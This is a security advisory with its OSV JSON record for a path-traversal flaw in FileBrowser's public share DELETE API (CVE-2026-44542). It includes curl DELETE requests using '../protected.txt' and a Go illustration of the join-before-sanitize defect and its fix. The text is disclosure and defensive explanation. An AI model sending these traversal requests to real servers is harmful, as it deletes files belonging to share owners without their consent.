GHSA-FWJ3-42WH-8673

Vulnerability from github – Published: 2026-05-07 03:28 – Updated: 2026-05-14 20:54
Summary
FileBrowser Public Share DELETE API Path Traversal Allows Unauthenticated Arbitrary File Deletion
Details

Summary

Attacker-controlled path input is joined with a trusted base path prior to sanitization, allowing traversal sequences (e.g., ../) to escape the intended shared directory. As a result, an unauthenticated attacker possessing a valid public share hash with delete permissions enabled can delete arbitrary files outside the shared directory within the share owner’s configured storage scope.

Affected Components

Two distinct vulnerable code paths:

  1. Stable versions (e.g., gtstef/filebrowser:stable)
     DELETE /public/api/resources?hash=<hash>&path=../victim
     Root cause: middleware.go:111
     Issue: path query parameter is joined before SanitizeUserPath()
  2. Development / HEAD (e.g., commit eabdfd9)
     DELETE /public/api/resources/bulk?hash=<hash>
     Body: [{"path":"../victim"}]
     Root cause: resource.go:274
     Issue: item.Path is joined before SanitizeUserPath()
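
Both code paths share one ordering defect, shown here in an added Go illustration that is my own code, not FileBrowser's: sanitizeUserPath is a stand-in for the advisory's SanitizeUserPath, and resolveVulnerable, resolveFixed and withinRoot are names I chose. Joining the caller's path (query parameter or bulk-body item.Path) onto the share root before cleaning lets ../ resolve out of the share and cleaning afterwards changes nothing, while cleaning the untrusted component first keeps it clamped under the root; withinRoot is the containment check to apply to the final path regardless.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// resolveVulnerable mirrors the flawed ordering: the untrusted path is
// joined onto the trusted share root first. path.Join already cleans the
// result, so "../protected.txt" has collapsed out of shareRoot by the time
// the sanitizer runs, and sanitizing the joined path is a no-op.
func resolveVulnerable(shareRoot, userPath string) string {
	return sanitizeUserPath(path.Join(shareRoot, userPath))
}

// sanitizeUserPath cleans the untrusted component on its own, rooted at "/",
// so ".." can never climb above the share root once it is joined.
// Illustrative stand-in for the advisory's SanitizeUserPath, not its code.
func sanitizeUserPath(userPath string) string {
	return path.Clean("/" + userPath)
}

// resolveFixed sanitizes the untrusted component before joining it.
func resolveFixed(shareRoot, userPath string) string {
	return path.Join(path.Clean("/"+shareRoot), sanitizeUserPath(userPath))
}

// withinRoot reports whether full is root itself or lies strictly under it;
// a final containment check on the joined path, independent of the sanitizer.
func withinRoot(root, full string) bool {
	return full == root || strings.HasPrefix(full, root+"/")
}

func main() {
	root := "/folder/shared_subdir" // constructed sample share root
	for _, p := range []string{"a.txt", "../protected.txt", "sub/../../protected.txt"} {
		v, f := resolveVulnerable(root, p), resolveFixed(root, p)
		fmt.Printf("%-24s vulnerable=%-32s (inside=%t)  fixed=%s (inside=%t)\n",
			p, v, withinRoot(root, v), f, withinRoot(root, f))
	}
}
```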

Steps to reproduce (Stable Version)

1. Create a directory structure:

/folder/shared_subdir/   (shared)
/folder/protected.txt    (outside shared directory)

2. Create a public share:

Path: /shared_subdir
AllowDelete=true

3. Send request:

curl -X DELETE "http://localhost/public/api/resources?hash=<HASH>&path=../protected.txt"

# Observe:
# protected.txt is deleted despite being outside the shared directory

Proof of Concept (HEAD / bulk endpoint)

curl -X DELETE "http://localhost/public/api/resources/bulk?hash=<HASH>" \
  -H "Content-Type: application/json" \
  -d '[{"path":"../protected.txt"}]'

Alternative PoC Scripts:

poc_v3.sh (https://github.com/user-attachments/files/26159404/poc_v3.sh) (If the script fails due to environment differences, the manual PoC above reliably reproduces the issue.)

Impact

An unauthenticated attacker with access to a public share link configured with delete permissions enabled can delete attacker-chosen files outside the shared directory, anywhere within the share owner’s storage scope. This results in unauthorized data loss and potential service disruption.


{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gtsteffaniak/filebrowser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260501183844-112740bdd41d"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44542"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T03:28:06Z",
    "nvd_published_at": "2026-05-14T18:16:50Z",
    "severity": "CRITICAL"
  },
  "details": "### **Summary**\n\nAttacker-controlled path input is joined with a trusted base path prior to sanitization, allowing traversal sequences (e.g., ../) to escape the intended shared directory. As a result, an unauthenticated attacker possessing a valid public share hash with delete permissions enabled can delete arbitrary files outside the shared directory within the share owner\u2019s configured storage scope.\n\n### **Affected Components**\n\n**Two distinct vulnerable code paths:**\n\n1. Stable versions (e.g., gtstef/filebrowser:stable)\n`DELETE /public/api/resources?hash=\u003chash\u003e\u0026path=../victim`\nRoot cause: middleware.go:111\nIssue: path query parameter is joined before SanitizeUserPath()\n2. Development / HEAD (e.g., commit eabdfd9)\n`DELETE /public/api/resources/bulk?hash=\u003chash\u003e`\nBody: [{\"path\":\"../victim\"}]\nRoot cause: resource.go:274\nIssue: item.Path is joined before SanitizeUserPath()\n\n### **Steps to reproduce (Stable Version)**\n\n**1. Create a directory structure:**\n\n```\n/folder/shared_subdir/   (shared)\n/folder/protected.txt    (outside shared directory)\n```\n\n**2. Create a public share:**\n```\nPath: /shared_subdir\nAllowDelete=true\n```\n\n**3. Send request:**\n\n```\ncurl -X DELETE \"http://localhost/public/api/resources?hash=\u003cHASH\u003e\u0026path=../protected.txt\"\n\n#Observe:\n#protected.txt is deleted despite being outside the shared directory\n```\n\n### **Proof of Concept (HEAD / bulk endpoint)**\n\n```\ncurl -X DELETE \"http://localhost/public/api/resources/bulk?hash=\u003cHASH\u003e\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027[{\"path\":\"../protected.txt\"}]\u0027\n```\n\n### **Alternative PoC Scripts:**\n[poc_v3.sh](https://github.com/user-attachments/files/26159404/poc_v3.sh) (**If the script fails due to environment differences, the manual PoC above reliably reproduces the issue.**)\n\n\n### **Impact**\nAn unauthenticated attacker with access to a public share link configured with delete permissions enabled can delete attacker-chosen files outside the shared directory, anywhere within the share owner\u2019s storage scope. This results in unauthorized data loss and potential service disruption.",
  "id": "GHSA-fwj3-42wh-8673",
  "modified": "2026-05-14T20:54:32Z",
  "published": "2026-05-07T03:28:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-fwj3-42wh-8673"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44542"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gtsteffaniak/filebrowser/commit/112740bdd41de7d5eb01e13ba49d406bfc463f69"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gtsteffaniak/filebrowser"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "FileBrowser Public Share DELETE API Path Traversal Allows Unauthenticated Arbitrary File Deletion"
}

